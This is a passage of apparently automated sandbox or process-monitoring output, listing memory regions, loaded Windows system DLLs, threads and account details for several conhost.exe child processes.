0x0 region_type = private name = "private_0x000000c47d430000" filename = "" Region: id = 3273 start_va = 0xc47d440000 end_va = 0xc47d44ffff entry_point = 0x0 region_type = private name = "private_0x000000c47d440000" filename = "" Region: id = 3274 start_va = 0xc47d450000 end_va = 0xc47d5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c47d450000" filename = "" Region: id = 3275 start_va = 0xc47d5e0000 end_va = 0xc47e9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c47d5e0000" filename = "" Region: id = 3276 start_va = 0x7ff6c42e0000 end_va = 0x7ff6c43dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42e0000" filename = "" Region: id = 3277 start_va = 0x7ff6c440c000 end_va = 0x7ff6c440dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c440c000" filename = "" Region: id = 3278 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3279 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3280 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3281 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3282 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3283 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3284 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3285 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3286 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3287 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3288 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3289 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4236 start_va = 0xc47e9e0000 end_va = 0xc47ea1ffff entry_point = 0x0 region_type = private name = "private_0x000000c47e9e0000" filename = "" Region: id = 4237 start_va = 0xc47ea20000 end_va = 0xc47eb34fff entry_point = 0x0 region_type = private name = "private_0x000000c47ea20000" filename = "" Region: id = 4238 start_va = 0xc47eb40000 end_va = 0xc47eb4ffff entry_point = 0x0 region_type = private name = "private_0x000000c47eb40000" filename = "" Region: id = 4239 start_va = 0xc47eb50000 end_va = 0xc47ec60fff entry_point = 0x0 region_type = private name = "private_0x000000c47eb50000" filename = "" Region: id = 4240 start_va = 0xc47ec70000 end_va = 0xc47ec7ffff entry_point = 0x0 region_type = private name = "private_0x000000c47ec70000" filename = "" Region: id = 4241 start_va = 0xc47ec80000 end_va = 0xc47efb6fff entry_point = 0xc47ec80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4242 start_va = 0xc47efc0000 end_va = 0xc47f1d4fff entry_point = 0x0 region_type = private name = "private_0x000000c47efc0000" filename = "" Region: id = 4243 start_va = 0xc47f1e0000 end_va = 0xc47f3f6fff entry_point = 0x0 region_type = private name = "private_0x000000c47f1e0000" filename = "" Region: id = 4244 start_va = 0xc47f400000 end_va = 0xc47f611fff entry_point = 0x0 region_type = private name = "private_0x000000c47f400000" filename = "" Region: id = 4245 start_va = 0x7ff6c4408000 end_va = 0x7ff6c4409fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4408000" filename = "" Region: id = 4246 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4247 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4248 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4249 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4250 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4251 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4252 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4253 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4254 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 121 os_tid = 0xeb4 Thread: id = 165 os_tid = 0xfe0 Thread: id = 234 os_tid = 0x10ac Thread: id = 285 os_tid = 0x11a4 Process: id = "91" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf705000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0xd54" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1971 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1972 start_va = 0xcf854a0000 end_va = 0xcf854bffff entry_point = 0x0 region_type = private name = "private_0x000000cf854a0000" filename = "" Region: id = 1973 start_va = 0xcf854c0000 end_va = 0xcf854d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cf854c0000" filename = "" Region: id = 1974 start_va = 0xcf854e0000 end_va = 0xcf8551ffff entry_point = 0x0 region_type = private name = "private_0x000000cf854e0000" filename = "" Region: id = 1975 start_va = 0x7df5ff560000 end_va = 0x7ff5ff55ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff560000" filename = "" Region: id = 1976 start_va = 0x7ff6c4400000 end_va = 0x7ff6c4422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4400000" filename = "" Region: id = 1977 start_va = 0x7ff6c4428000 end_va = 0x7ff6c4428fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4428000" filename = "" Region: id = 1978 start_va = 0x7ff6c442e000 end_va = 0x7ff6c442ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c442e000" filename = "" Region: id = 1979 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1980 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1981 start_va = 0xcf855d0000 end_va = 0xcf856cffff entry_point = 0x0 region_type = private name = "private_0x000000cf855d0000" filename = "" Region: id = 1982 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1983 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3316 start_va = 0xcf854a0000 end_va = 0xcf854affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cf854a0000" filename = "" Region: id = 3317 start_va = 0xcf854b0000 end_va = 0xcf854b6fff entry_point = 0x0 region_type = private name = "private_0x000000cf854b0000" filename = "" Region: id = 3318 start_va = 0xcf85520000 end_va = 0xcf8555ffff entry_point = 0x0 region_type = private name = "private_0x000000cf85520000" filename = "" Region: id = 3319 start_va = 0xcf85560000 end_va = 0xcf85560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cf85560000" filename = "" Region: id = 3320 start_va = 0xcf85570000 end_va = 0xcf85576fff entry_point = 0x0 region_type = private name = "private_0x000000cf85570000" filename = "" Region: id = 3321 start_va = 0xcf85580000 end_va = 0xcf85580fff entry_point = 0x0 region_type = private name = "private_0x000000cf85580000" filename = "" Region: id = 3322 start_va = 0xcf85590000 end_va = 0xcf85590fff entry_point = 0x0 region_type = private name = "private_0x000000cf85590000" filename = "" Region: id = 3323 start_va = 0xcf856d0000 end_va = 0xcf8578dfff entry_point = 0xcf856d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3324 start_va = 0xcf858a0000 end_va = 0xcf858affff entry_point = 0x0 region_type = private name = "private_0x000000cf858a0000" filename = "" Region: id = 3325 start_va = 0xcf858b0000 end_va = 0xcf85a37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cf858b0000" filename = "" Region: id = 3326 start_va = 0xcf85a40000 end_va = 0xcf85bc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cf85a40000" filename = "" Region: id = 3327 start_va = 0xcf85bd0000 end_va = 0xcf86fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000cf85bd0000" filename = "" Region: id = 3328 start_va = 0x7ff6c4300000 end_va = 0x7ff6c43fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4300000" filename = "" Region: id = 3329 start_va = 0x7ff6c442c000 end_va = 0x7ff6c442dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c442c000" filename = "" Region: id = 3330 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3331 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3332 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3333 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3334 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3335 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3336 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3337 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3338 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3339 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3340 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3341 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4183 start_va = 0xcf85790000 end_va = 0xcf857cffff entry_point = 0x0 region_type = private name = "private_0x000000cf85790000" filename = "" Region: id = 4184 start_va = 0xcf86fd0000 end_va = 0xcf870dcfff entry_point = 0x0 region_type = private name = "private_0x000000cf86fd0000" filename = "" Region: id = 4185 start_va = 0xcf87110000 end_va = 0xcf8711ffff entry_point = 0x0 region_type = private name = "private_0x000000cf87110000" filename = "" Region: id = 4186 start_va = 0xcf87120000 end_va = 0xcf87232fff entry_point = 0x0 region_type = private name = "private_0x000000cf87120000" filename = "" Region: id = 4187 start_va = 0xcf872a0000 end_va = 0xcf872affff entry_point = 0x0 region_type = private name = "private_0x000000cf872a0000" filename = "" Region: id = 4188 start_va = 0xcf872b0000 end_va = 0xcf875e6fff entry_point = 0xcf872b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4189 start_va = 0xcf875f0000 end_va = 0xcf87805fff entry_point = 0x0 region_type = private name = "private_0x000000cf875f0000" filename = "" Region: id = 4190 start_va = 0xcf87810000 end_va = 0xcf87a2ffff entry_point = 0x0 region_type = private name = "private_0x000000cf87810000" filename = "" Region: id = 4191 start_va = 0xcf87a30000 end_va = 0xcf87c4bfff entry_point = 0x0 region_type = private name = "private_0x000000cf87a30000" filename = "" Region: id = 4192 start_va = 0x7ff6c442a000 end_va = 0x7ff6c442bfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c442a000" filename = "" Region: id = 4193 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4194 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4195 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4196 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4197 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4198 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 4199 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4200 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 4201 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Thread: id = 122 os_tid = 0xebc Thread: id = 167 os_tid = 0xfe8 Thread: id = 236 os_tid = 0x10b4 Thread: id = 283 os_tid = 0x119c Process: id = "92" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7917d000" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "49" os_parent_pid = "0xd5c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1984 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1985 start_va = 0x5815d10000 end_va = 0x5815d2ffff entry_point = 0x0 region_type = private name = "private_0x0000005815d10000" filename = "" Region: id = 1986 start_va = 0x5815d30000 end_va = 0x5815d43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005815d30000" filename = "" Region: id = 1987 start_va = 0x5815d50000 end_va = 0x5815d8ffff entry_point = 0x0 region_type = private name = "private_0x0000005815d50000" filename = "" Region: id = 1988 start_va = 0x7df5ffb70000 end_va = 0x7ff5ffb6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb70000" filename = "" Region: id = 1989 start_va = 0x7ff6c4000000 end_va = 0x7ff6c4022fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4000000" filename = "" Region: id = 1990 start_va = 0x7ff6c4027000 end_va = 0x7ff6c4027fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4027000" filename = "" Region: id = 1991 start_va = 0x7ff6c402e000 end_va = 0x7ff6c402ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c402e000" filename = "" Region: id = 1992 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1993 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1994 start_va = 0x5815ef0000 end_va = 0x5815feffff entry_point = 0x0 region_type = private name = "private_0x0000005815ef0000" filename = "" Region: id = 1995 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1996 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2557 start_va = 0x5815d10000 end_va = 0x5815d1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005815d10000" filename = "" Region: id = 2558 start_va = 0x5815d20000 end_va = 0x5815d26fff entry_point = 0x0 region_type = private name = "private_0x0000005815d20000" filename = "" Region: id = 2559 start_va = 0x5815d90000 end_va = 0x5815e4dfff entry_point = 0x5815d90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2560 start_va = 0x5815e50000 end_va = 0x5815e8ffff entry_point = 0x0 region_type = private name = "private_0x0000005815e50000" filename = "" Region: id = 2561 start_va = 0x5815e90000 end_va = 0x5815e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005815e90000" filename = "" Region: id = 2562 start_va = 0x5815ea0000 end_va = 0x5815ea6fff entry_point = 0x0 region_type = private name = "private_0x0000005815ea0000" filename = "" Region: id = 2563 start_va = 0x5815eb0000 end_va = 0x5815eb0fff entry_point = 0x0 region_type = private name = "private_0x0000005815eb0000" filename = "" Region: id = 2564 start_va = 0x5815ec0000 end_va = 0x5815ec0fff entry_point = 0x0 region_type = private name = "private_0x0000005815ec0000" filename = "" Region: id = 2565 start_va = 0x5816070000 end_va = 0x581607ffff entry_point = 0x0 region_type = private name = "private_0x0000005816070000" filename = "" Region: id = 2566 start_va = 0x5816080000 end_va = 0x5816207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005816080000" filename = "" Region: id = 2567 start_va = 0x5816210000 end_va = 0x5816390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005816210000" filename = "" Region: id = 2568 start_va = 0x58163a0000 end_va = 0x581779ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000058163a0000" filename = "" Region: id = 2569 start_va = 0x7ff6c3f00000 end_va = 0x7ff6c3ffffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3f00000" filename = "" Region: id = 2570 start_va = 0x7ff6c402c000 end_va = 0x7ff6c402dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c402c000" filename = "" Region: id = 2571 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2572 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2573 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2574 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2575 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2576 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2577 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2578 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2579 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2580 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2581 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2582 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 123 os_tid = 0xec4 Thread: id = 168 os_tid = 0xfec Thread: id = 205 os_tid = 0x1020 Thread: id = 265 os_tid = 0x1154 Process: id = "93" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0xf651000" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "50" os_parent_pid = "0xd64" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], 